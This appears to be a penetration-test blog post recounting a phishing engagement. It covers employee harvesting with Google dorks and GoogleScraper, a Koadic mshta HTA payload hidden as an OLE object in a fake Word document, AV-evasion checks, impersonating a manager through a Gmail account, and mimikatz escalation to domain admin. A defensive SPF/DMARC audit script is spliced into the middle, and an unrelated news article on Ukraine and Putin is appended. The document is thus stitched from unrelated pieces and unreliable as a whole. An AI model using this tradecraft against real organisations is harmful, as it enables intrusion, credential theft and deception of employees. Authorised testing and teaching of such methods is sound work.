My team was recently engaged by a client (Hackme) to perform a black-box external penetration test. The objective was simple – see how susceptible the organization is from an external point of view and test the effectiveness of the security controls that are managed enterprise-wide. As such, aside from the company name, we were given “ZERO” information.

The following details illustrate how we embarked upon this assessment which resulted in…

OSINT 101

We kicked off with some Open Source Intelligence (OSINT) 101 :). There are quite a number of open source intelligence tools to assist in gathering emails, subdomains, hosts, employee names, etc. from different public sources like search engines and Shodan. There is an exhaustive list of such awesome tools here.

Using quite a few open source intelligence tools, we obtained publicly available documents relating to the organization.

With Google dork to the rescue, we ran some basic search strings: “site:*.hackme.com ext:xls OR ext:docx OR ext:pptx” . Of course, our aim was not to tirelessly search for documents. Rather, our objective was to understand the organization’s naming schema by examining the metadata of the documents which is found in the “properties section” of the document (most especially Microsoft Word, PowerPoint and Excel). One can also use FOCA for this.

From this, I noticed that employees’ emails followed a particular naming convention – the first letter of the first name + surname @ domain.com, i.e. rakinyele@hackme[.]com.

Armed with this knowledge, we forked out from LinkedIn the list of all current employees of Hackme using the following google dork syntax:

site:linkedin.com -inurl:dir "at Hackme" "Current". A typical example is shown below using Google Inc as a reference company.

By hacking a script to automate the process, we copied out the first names, last names and roles of the current employees of Hackme. A tiring approach is to manually crawl through the Google pages in search of these names and roles; alternatively, one could use GoogleScraper:

GoogleScraper -m http --keyword "site:linkedin.com -inurl:dir 'at Hackme' 'Current'" --num-pages-for-keyword 3 --output-filename output.json

…and then the results:

Again, I leave the possibilities to your imagination – but you can easily convert this to a .csv file using https://json-csv[.]com/ or any other converter that works for you.

…and then using your favorite word processor (word merge, notepad++, etc) or some good scriptfu skills, merge the firstname + lastname – to form your email list.

Now it’s time to feed our target list a payload…

Since we are simulating a black-box external attack, we decided (just like what an attacker would do) to gain code execution using malicious payloads. As such, we thought of creating a payload and sending it via emails to employees of Hackme.

We also know that it is a common practice for some file type/extensions to be blocked by the organization’s email filters – to limit exposure to risk.

This then brings us to using Koadic C3 COM Command & Control, a very decent framework just like your Meterpreter or Empire. What made it really stand out, aside from the beautiful interface, is that it allows one to dump hashes, download/upload files, execute commands, bypass UAC, scan local network for open SMB, pivot to another machine, load mimikatz and a lot more.

So we ran Koadic and set the necessary variables, using the “stager/js/mshta” module (serves payloads in memory using MSHTA.exe HTML Applications).

The result was a spawn of our HTA payload url as evidenced in the screenshot above. However, we need our targets to execute our payload as “mshta payload_url”. In recent years, HTA payloads have been used as a web attack vector and also, to drop malware on a victim’s PC. Now we need to get this payload past our victim’s numerous defenses.

Here comes the tricky part – we needed a way to have the victim run “mshta payload_url” without our payload being spawned as a child process of mshta.exe – as we suspect this organization’s blue team may flag this.

Thankfully, we saw the tip on the left from Matt Nelson and interestingly, the team at NCCgroup have this implemented in Demiguise.

So here is our final payload saved as a .hta file

The next step typically is to send our .hta payload as an embedded OLE object.

The intended attack scenario was:

  1. Send a Microsoft word document with our .hta payload embedded as an OLE object.
  2. Get the user to open the word document and the embedded OLE object.
  3. This spawns a new process and we get a shell access into our victim’s PC.

Now we get to the interesting part, we need our victim to open the Microsoft word document and our payload.

 To do this, we need a very compelling story – just because users are getting smarter. So we headed back to doing more recon.

…and more recon

We need to know more about Hackme – specifically the culture and employees behaviour. The question we kept asking ourselves was “what would interest the employees?”

Where else to get this information than Glassdoor , a platform that gives you inside scoop on companies with employee reviews about salaries, benefits, pros and cons of working with the company.

After poring through reviews of Hackme on Glassdoor, we found some common themes:


1. Some employees felt mobility was a challenge as the office is quite a long distance from residential locations.

2. Employees love the organization because they get free lunch.

But Wait!

Like the old saying goes, the fastest way to a man’s heart is through his stomach. So what better way to get the employees to open our payload embedded word document?

Send them an email – telling them there is a change in the FREE LUNCH menu starting from tomorrow.

Rather than send a random phishing email to employees that could be spotted easily, we decided a seemingly genuine email would be ideal complete with Hackme email signature while observing the organization email culture. Now, how do we make our email more believable? By sending an email to Customer service/Help Desk with a service request and observing the email signature in the response.

… recon again???

We headed back to Linkedin, to look for the name of either the HR Manager, Logistic Manager or Admin Manager (whichever is appropriate) of Hackme. We carefully crafted an email signature with the name we selected.

We are halfway through sending our payload now. Have some patience and read on…

time to send our payload

From the metadata recon done earlier, we could tell what our target organization’s document headers and footers looked like. I then created a new word document like the one shown below with a splitting image of Hackme document template with appropriate headers/footers.

…and then we embedded our .hta as an OLE object. Microsoft Word Document >> Insert >> Object >> Package. We changed the icon to Microsoft Word’s icon and also the caption to reflect our message.

Don’t forget the antivirus!!!

To check the AV detection rate of our payload – and to see if it will be flagged as malicious by Hackme antivirus solution (if any), we did a quick AV scan on nodistribute.com. Nodistribute.com was used because according to them, they don’t distribute payload samples to AV companies. We scanned both the maldoc and the .hta file as well.

AV Scan of our .hta payload (0 detections)

 …it’s time to send our email

If the target org does not have SPF, DKIM and DMARC configured, one can easily spoof the HR Manager, Logistic Manager or Admin Manager’s email address. In this case, I created a Gmail account (yes, gmail works too) using the Logistic Manager’s first name and last name – and then spiced it up with his signature which was gotten earlier.
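A defender's view of the condition above, as an added example that is not from the original post: it audits SPF and DMARC TXT records for spoofing gaps and separately flags a From: header that shows a staff name on an outside address, which is the case a free-mail account relies on. The records, message, domains and staff name are constructed; DKIM is left out because its selectors cannot be derived from the domain name alone.

```python
import re
from email import message_from_string
from email.utils import parseaddr

def spf_all_qualifier(txt_records):
    """Qualifier of the SPF 'all' term ('-', '~', '?', '+'); '' if the record
    has no 'all' term; None if there is no SPF record at all."""
    for txt in txt_records:
        terms = txt.lower().split()
        if terms and terms[0] == "v=spf1":
            for term in terms[1:]:
                match = re.fullmatch(r"([-+~?]?)all", term)
                if match:
                    return match.group(1) or "+"  # bare 'all' means '+all'
            return ""
    return None

def dmarc_tags(txt_records):
    """Tag/value pairs of the DMARC record, or None if there is none."""
    for txt in txt_records:
        if txt.strip().lower().startswith("v=dmarc1"):
            tags = {}
            for part in txt.split(";"):
                key, sep, value = part.partition("=")
                if sep:
                    tags[key.strip().lower()] = value.strip().lower()
            return tags
    return None

def audit_domain(spf_txt, dmarc_txt):
    """List the gaps that let outsiders send mail as the audited domain."""
    findings = []
    enforcing = False
    tags = dmarc_tags(dmarc_txt)
    if tags is None:
        findings.append("dmarc: no record")
    else:
        policy = tags.get("p", "none")
        pct = int(tags.get("pct", "100"))
        enforcing = policy in ("quarantine", "reject") and pct == 100
        if policy == "none":
            findings.append("dmarc: p=none (monitor only)")
        elif pct < 100:
            findings.append(f"dmarc: policy applied to only {pct}% of mail")
    qualifier = spf_all_qualifier(spf_txt)
    if qualifier is None:
        findings.append("spf: no record")
    elif qualifier in ("", "+", "?") or (qualifier == "~" and not enforcing):
        findings.append(f"spf: 'all' qualifier {qualifier!r} does not fail unlisted senders")
    return findings

def impersonates_staff(raw_message, org_domain, staff_names):
    """True if From: shows a staff member's name on an address outside org_domain.
    SPF and DMARC on org_domain cannot catch this: the sending domain is not ours."""
    display, address = parseaddr(message_from_string(raw_message).get("From", ""))
    domain = address.rpartition("@")[2].lower()
    internal = domain == org_domain or domain.endswith("." + org_domain)
    normalized = " ".join(display.lower().split())
    return bool(normalized) and not internal and normalized in staff_names

# Constructed records and message (hackme.example and freemail.example are placeholders).
WEAK_SPF = ["v=spf1 include:_spf.mailhost.example ~all"]
WEAK_DMARC = ["v=DMARC1; p=none; rua=mailto:dmarc@hackme.example"]
STRICT_SPF = ["v=spf1 ip4:192.0.2.0/24 -all"]
STRICT_DMARC = ["v=DMARC1; p=reject; rua=mailto:dmarc@hackme.example"]
LOOKALIKE_MAIL = (
    'From: "Jane Doe" <jane.doe@freemail.example>\n'
    "To: staff@hackme.example\n"
    "Subject: Change to the free lunch menu\n"
    "\n"
    "Please see the attached menu.\n"
)

if __name__ == "__main__":
    print(audit_domain(WEAK_SPF, WEAK_DMARC))
    print(audit_domain(STRICT_SPF, STRICT_DMARC))
    print(impersonates_staff(LOOKALIKE_MAIL, "hackme.example", {"jane doe"}))
```

Even the strict records leave the lookalike message untouched, so the display-name check has to run at the mail gateway alongside them.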

Let the shells in

Shortly after sending the email, within a period of about 3 minutes, we had at least 30 shell connections! W00t!!!

What next?

The rest they often say is history. From here-on, using the mimikatz modules, we escalated privileges, dumped hashes, scanned the local network of Hackme, pivoted into other PCs, browsed the target’s file systems and even became domain admins etc.

In conclusion

All in all, this was a very fun engagement. Whilst it may take an attacker a month, two months or a year of dedication to break into an organization through a loophole at the infrastructure level, it can be fairly easy to gain access by exploiting the human factor.

“Once you understand your target environment, devising a creative means in gaining access to the environment becomes fairly easy”.

The moral of the exercise is: Recon, recon and more recon – for a wise man once said “Give me six hours to chop down a tree and I will spend the first four sharpening the axe”.


“His ultimate goal is to destroy Ukraine” – Ukrainian foreign minister


Ukrainian Minister of Foreign Affairs, Dmytro Kuleba says he knows what Russian President Vladimir Putin’s long-term objective is.

Ultimate Goal Is to Destroy Ukraine

“His ultimate goal is to destroy Ukraine. He’s not interested in parts of Ukraine. He is not interested in even keeping the entire country under his control,” Kuleba said during a live interview with CNN’s Jake Tapper.

Putin “wants the idea of the Ukrainian statehood to fail. This is his objective.”

Kuleba’s comments come one day after President Vladimir Putin ordered troops into pro-Russian regions of eastern Ukraine just hours after he signed decrees recognizing the independence of the Moscow-backed regions.

“What I know for certain, and this was eloquently proved, regretfully, in his address yesterday, is that he hates [the] Ukrainian statehood, he believes that Ukraine has no right to exist,” Kuleba said of Putin.

Following the deployment of Russian troops into eastern Ukraine, US President Joe Biden said that such maneuvering constitutes the beginning of “an invasion.” In response, Biden announced what he labeled “the first tranche of sanctions,” including on two large financial institutions, Russian sovereign debt and Russian elites and their family members. 

Though Kuleba supports the sanctions as laid out by Biden, calling them an “important” message, he maintains they are insufficient as the situation stands now.

“No sanctions will be enough until Russian boots withdraw from Ukrainian soil,” said Kuleba on CNN. “This is [the] fundamental principle, that we have to keep putting pressure on Russia and we in Ukraine proceed from the fact that the sanctions announced today by President Biden is just the beginning of the process of deterring president Putin and making him withdraw.”

On the topic of specific forthcoming sanctions, Kuleba suggested no single option or possibility should be left off the global table.

“We want every instrument available to be used in order to stop Putin,” he said. “If the price of saving a country is the most, harshest sanctions possible, then we should go for the harshest sanctions possible.”

While Kuleba told Tapper that the moving of Russian troops into the Ukrainian-controlled parts of the Donbas region would mark another crossing of a line by Putin, he noted that the ongoing conflict manifests itself along a multitude of fronts.

“We should be aware of the simple fact: this is hybrid warfare. Russia can attack physically, but also Russian can attack us in cyberspace … We are in a dialogue with partners including the United States about the identification of these red lines which will be responded with sanctions,” he said, adding, “I want to make it clear that we have to get ready to act in a very swift manner because the situation can change literally every hour.”

Asked by Tapper to explain why the United States — which sits thousands of miles from Ukraine — ought to be invested in the conflict, Kuleba pointed to three key factors.

  • “First, in 1994 Ukraine abandoned its nuclear arsenal which was the third in size in the world … We abandoned it in return for security guarantees issued in particular by the United States. We were promised that if anyone attacks us, the United States would be among countries who will be helping us.”
  • “Second, what is happening in Ukraine is not only about Ukraine. President Putin challenges Euro-Atlantic order. If the West fails in Ukraine, the next target of Putin will be one of the NATO members on its eastern flank.”
  • “Third, if Putin succeeds in Ukraine, other players across the globe who want to change rules, who want to bypass the United States, they will see that this is possible, that the West is incapable of defending what it stands for.”

In summing up his explanation as to why the US involvement in the conflict is appropriate, Kuleba said: “All in all … Americans should be interested in keeping the world order as it stands and the future of this order is being decided right now in Ukraine.”
